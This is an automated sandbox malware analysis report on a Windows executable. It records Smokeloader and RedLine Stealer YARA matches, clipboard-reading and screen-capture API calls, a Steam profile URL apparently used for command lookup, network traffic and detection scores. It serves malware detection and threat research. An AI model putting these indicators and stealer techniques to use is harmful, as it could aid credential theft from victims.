Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.00000000006CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1765053093.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.00000000006E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000751000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe

Code function: 0_2_004327B0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

0_2_004327B0

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe

Code function: 0_2_004327B0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

0_2_004327B0

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe

Code function: 0_2_004339F0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

0_2_004339F0

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2043604722.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0043E840	0_2_0043E840
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0040A8C0	0_2_0040A8C0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00437BC0	0_2_00437BC0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0040AD40	0_2_0040AD40
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004085D0	0_2_004085D0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0040C63C	0_2_0040C63C
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0043506D	0_2_0043506D
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00428889	0_2_00428889
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004088B0	0_2_004088B0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00409150	0_2_00409150
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00405950	0_2_00405950
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0041A150	0_2_0041A150
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00430161	0_2_00430161
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00414170	0_2_00414170
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0043A970	0_2_0043A970
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0043B100	0_2_0043B100
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0041910E	0_2_0041910E
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0040D120	0_2_0040D120
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00403920	0_2_00403920
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0041912E	0_2_0041912E
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00416930	0_2_00416930
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0043E9D0	0_2_0043E9D0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004199E2	0_2_004199E2
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00437180	0_2_00437180
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0043D980	0_2_0043D980
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004111A6	0_2_004111A6
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00406240	0_2_00406240
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0041CA70	0_2_0041CA70
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0041D200	0_2_0041D200
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0041FA10	0_2_0041FA10
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00423A1C	0_2_00423A1C
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0041E220	0_2_0041E220
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00423A2A	0_2_00423A2A
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0042822E	0_2_0042822E
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00426A30	0_2_00426A30
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00409AC1	0_2_00409AC1
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004042D0	0_2_004042D0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004272D0	0_2_004272D0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004292D1	0_2_004292D1
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004162F1	0_2_004162F1
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00421A80	0_2_00421A80
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00424280	0_2_00424280
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0043F280	0_2_0043F280
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0043DA80	0_2_0043DA80
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00428A9B	0_2_00428A9B
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00424AA8	0_2_00424AA8
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00402B40	0_2_00402B40
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0041B360	0_2_0041B360
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00432370	0_2_00432370
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0042DB7F	0_2_0042DB7F
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0043DBF0	0_2_0043DBF0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00419BFF	0_2_00419BFF
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00435B98	0_2_00435B98
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004223A0	0_2_004223A0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004383A0	0_2_004383A0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00411C40	0_2_00411C40
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0042DB7A	0_2_0042DB7A
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0041542D	0_2_0041542D
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004144D5	0_2_004144D5
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0040ECE0	0_2_0040ECE0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0043DC80	0_2_0043DC80
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0043EC80	0_2_0043EC80
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00424486	0_2_00424486
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004074A0	0_2_004074A0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0041E560	0_2_0041E560
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0043DD00	0_2_0043DD00
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004325C0	0_2_004325C0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0043ADE0	0_2_0043ADE0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0043F5E0	0_2_0043F5E0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004105F3	0_2_004105F3
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0040E59D	0_2_0040E59D
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00419BFF	0_2_00419BFF
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004365B4	0_2_004365B4
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0041B650	0_2_0041B650
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00409600	0_2_00409600
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00416603	0_2_00416603
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0041DE20	0_2_0041DE20
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00438630	0_2_00438630
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00418638	0_2_00418638
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004066D0	0_2_004066D0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004266D0	0_2_004266D0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00415EDC	0_2_00415EDC
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00402EE0	0_2_00402EE0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00425691	0_2_00425691
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00423699	0_2_00423699
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00438F45	0_2_00438F45
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0043EF60	0_2_0043EF60
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0040DF04	0_2_0040DF04
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00422F0D	0_2_00422F0D
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00414F1E	0_2_00414F1E
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00436F20	0_2_00436F20
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004377E0	0_2_004377E0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00427780	0_2_00427780
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0041E790	0_2_0041E790
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004277A0	0_2_004277A0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00423FA0	0_2_00423FA0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004227B0	0_2_004227B0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0047471B	0_2_0047471B
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00629867	0_2_00629867
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0065B047	0_2_0065B047
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0065F847	0_2_0065F847
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0063085A	0_2_0063085A
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00652827	0_2_00652827
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00628837	0_2_00628837
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0062C8A3	0_2_0062C8A3
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_006388A1	0_2_006388A1
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0063B8B7	0_2_0063B8B7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0063E087	0_2_0063E087
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0063D08A	0_2_0063D08A
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00658897	0_2_00658897
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0062E16B	0_2_0062E16B
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00646937	0_2_00646937
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00626937	0_2_00626937
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0063E9F7	0_2_0063E9F7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0065F1C7	0_2_0065F1C7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00635185	0_2_00635185
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00657A47	0_2_00657A47
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00642A17	0_2_00642A17
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0065EAA7	0_2_0065EAA7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0062AB27	0_2_0062AB27
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00628B17	0_2_00628B17
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_006573E7	0_2_006573E7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_006503C8	0_2_006503C8
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0065ABD7	0_2_0065ABD7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0063A3B7	0_2_0063A3B7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00625BB7	0_2_00625BB7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_006293B7	0_2_006293B7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00623B87	0_2_00623B87
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0062D387	0_2_0062D387
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00639395	0_2_00639395
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0063D467	0_2_0063D467
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0063FC77	0_2_0063FC77
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0065EC37	0_2_0065EC37
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0063140D	0_2_0063140D
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0065F4E7	0_2_0065F4E7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00641CE7	0_2_00641CE7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_006264A7	0_2_006264A7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0063E487	0_2_0063E487
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00636558	0_2_00636558
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00629D28	0_2_00629D28
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00647537	0_2_00647537
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00624537	0_2_00624537
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00644D07	0_2_00644D07
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0064DDE6	0_2_0064DDE6
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0063B5C7	0_2_0063B5C7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_006525D7	0_2_006525D7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00622DA7	0_2_00622DA7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0063CD8D	0_2_0063CD8D
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00639E66	0_2_00639E66
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00657E27	0_2_00657E27
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00642607	0_2_00642607
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0065EEE7	0_2_0065EEE7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0064DDE1	0_2_0064DDE1
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00631EA7	0_2_00631EA7
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0062EF47	0_2_0062EF47
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00627707	0_2_00627707
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0063E7C7	0_2_0063E7C7

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: String function: 00414160 appears 69 times
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: String function: 006343C7 appears 52 times
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: String function: 00407EB0 appears 57 times
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: String function: 00628117 appears 71 times

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1656

Source: L5Kgf2Tvkc.exe, 00000000.00000003.1689088182.00000000006FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesDefence@ vs L5Kgf2Tvkc.exe
Source: L5Kgf2Tvkc.exe, 00000000.00000000.1681374867.000000000044B000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesDefence@ vs L5Kgf2Tvkc.exe
Source: L5Kgf2Tvkc.exe	Binary or memory string: OriginalFilenamesDefence@ vs L5Kgf2Tvkc.exe

Source: L5Kgf2Tvkc.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2043604722.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: L5Kgf2Tvkc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@3/9@11/2

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe

Code function: 0_2_004707A6 CreateToolhelp32Snapshot,Module32First,

0_2_004707A6

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe

Code function: 0_2_00437BC0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

0_2_00437BC0

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1436

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\526c33e3-cea6-4183-bde4-a61886ac1376

Jump to behavior

Source: L5Kgf2Tvkc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: L5Kgf2Tvkc.exe	Virustotal: Detection: 71%
Source: L5Kgf2Tvkc.exe	ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe

File read: C:\Users\user\Desktop\L5Kgf2Tvkc.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\L5Kgf2Tvkc.exe "C:\Users\user\Desktop\L5Kgf2Tvkc.exe"
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1656
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1740

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
